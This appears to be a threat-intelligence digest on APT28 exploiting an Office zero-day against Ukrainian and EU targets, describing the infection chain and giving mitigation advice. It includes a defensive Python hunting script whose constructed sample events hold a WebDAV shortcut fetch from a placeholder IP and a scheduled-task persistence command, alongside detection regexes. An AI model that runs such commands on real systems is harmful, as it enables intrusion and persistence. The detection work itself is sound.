Russia-linked APT28 attackers already abusing new Microsoft Office zero-day
Summary
Ukraine’s CERT (CERT-UA) reports that Russia-linked APT28 (aka Fancy Bear / UAC-0001) is actively exploiting a Microsoft Office security feature bypass, CVE-2026-21509. Weaponised documents appeared within days of Microsoft’s disclosure: phishing emails delivered malicious DOC attachments that trigger a WebDAV fetch, download a shortcut, deploy a DLL disguised as a Windows component and load shellcode hidden in an image file. Attackers establish persistence via COM hijacking and a scheduled task that restarts explorer.exe, then deploy the COVENANT post-exploitation framework. Traffic is routed through legitimate cloud storage to blend in. CERT-UA found campaigns targeting Ukrainian government bodies and organisations across EU member states and warns that rapid infrastructure churn and slow patch uptake will likely increase attacks.
Key Points
- Threat actor: APT28 (Fancy Bear / UAC-0001) is confirmed using CVE-2026-21509 in live campaigns.
- Timeline: A weaponised document was publicly observed within days of Microsoft’s disclosure, indicating pre-prepared exploit chains.
- Infection chain: malicious DOC → WebDAV fetch → downloaded shortcut → DLL masquerade + shellcode in an image → persistence via COM hijack and scheduled task.
- Post-exploitation: attackers deploy the COVENANT framework and route traffic via legitimate cloud storage to avoid detection.
- Targets: Ukrainian central government bodies and organisations in EU member states; phishing themes impersonated official Ukrainian services.
- Infrastructure tactics: payload domains registered and used the same day, showing fast cycling of infrastructure.
- Mitigation: Microsoft has released patches (including for older builds), but CERT-UA warns that slow patch rollout will delay protection; defenders should monitor or block Filen-related traffic and hunt for the described indicators.
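To make the hunt concrete, here is an added example (not from CERT-UA or the original report) that runs four heuristics for the chain stages listed above over constructed Sysmon-style events: a WebDAV UNC path in a command line, a user-hive CLSID InprocServer32 write (assumed here as the COM hijack location, since the report does not name the key), a scheduled task whose action references explorer.exe, and a DLL loaded into explorer.exe from a user-writable path. Event values, paths and the CLSID are constructed placeholders.

```python
import re

# Constructed Sysmon-style events (not real telemetry). Each chain stage appears
# once; events 1 and 6 are benign and must not match any rule.
SAMPLE_EVENTS = [
    {"n": 1, "type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'WINWORD.EXE /n "C:\Users\alice\Downloads\lure.doc"'},
    {"n": 2, "type": "process", "image": r"C:\Windows\explorer.exe",
     "cmd": r'explorer.exe \\203.0.113.5@80\DavWWWRoot\share\lure.lnk'},   # WebDAV fetch of the shortcut
    {"n": 3, "type": "imageload", "image": r"C:\Windows\explorer.exe",
     "loaded": r"C:\Users\alice\AppData\Roaming\Microsoft\msvcp_win.dll"},  # system-DLL name, user path
    {"n": 4, "type": "registry", "image": r"C:\Windows\System32\rundll32.exe",
     "key": r"HKU\S-1-5-21-1\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32"},
    {"n": 5, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn Updater /tr "cmd /c taskkill /f /im explorer.exe & explorer.exe" /sc minute /mo 30'},
    {"n": 6, "type": "imageload", "image": r"C:\Windows\explorer.exe",
     "loaded": r"C:\Windows\System32\shell32.dll"},
]

# \\host@80\..., \\host@SSL\... and \DavWWWRoot\ are the WebDAV Mini-Redirector UNC forms.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:80|443|SSL)\\|\\DavWWWRoot\\", re.I)
# Per-user COM registration that shadows a machine-wide CLSID (assumed hijack location).
COM_HIJACK = re.compile(
    r"^HK(?:CU|U\\[^\\]+)\\Software\\Classes\\CLSID\\\{[0-9A-F-]{36}\}\\(?:InprocServer32|LocalServer32)", re.I)
USER_WRITABLE = re.compile(r"^C:\\(?:Users|ProgramData)\\", re.I)


def hunt(events):
    """Return sorted (event_n, rule) pairs for events matching a chain stage."""
    hits = set()
    for e in events:
        text = " ".join(v for v in e.values() if isinstance(v, str))
        if WEBDAV_UNC.search(text):
            hits.add((e["n"], "webdav_unc_fetch"))
        if e["type"] == "registry" and COM_HIJACK.match(e.get("key", "")):
            hits.add((e["n"], "user_hive_com_hijack"))
        if e["type"] == "process" and e["image"].lower().endswith("schtasks.exe"):
            c = e["cmd"].lower()
            if "/create" in c and "explorer.exe" in c:
                hits.add((e["n"], "explorer_restart_task"))
        if (e["type"] == "imageload" and e["image"].lower().endswith("\\explorer.exe")
                and USER_WRITABLE.match(e["loaded"])):
            hits.add((e["n"], "user_path_dll_in_explorer"))
    return sorted(hits)


if __name__ == "__main__":
    for n, rule in hunt(SAMPLE_EVENTS):
        print(f"event {n}: {rule}")
```

Each rule alone will produce benign noise in a real environment; the value is in correlating several of them on one host within a short window.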
Why should I read this?
Because this one’s live and nasty — a big-name nation-state group turned a patch notice into a working exploit in days. If you run Office, get patches in, scan for weird WebDAV/shortcut activity and don’t assume cloud traffic is harmless. We read the messy details so you don’t have to — but you should act.
Author style
Punchy: urgent, short, and actionable. This is high-priority intelligence — patch, detect, and hunt now. If you manage security for organisations in Europe or work with Ukrainian partners, treat the technical details here as immediate telemetry to act on.
Context and relevance
This story matters because it illustrates a now-familiar pattern: zero-days are weaponised extremely quickly by sophisticated state-aligned actors and abused via Office documents — a long-standing, high-value vector. It underlines two persistent issues for defenders: the speed of exploit development and the practical difficulties organisations face in rolling out patches or adopting recommended mitigations. Expect more rapid reuse of disclosed flaws and continued blending of malicious traffic through legitimate services.
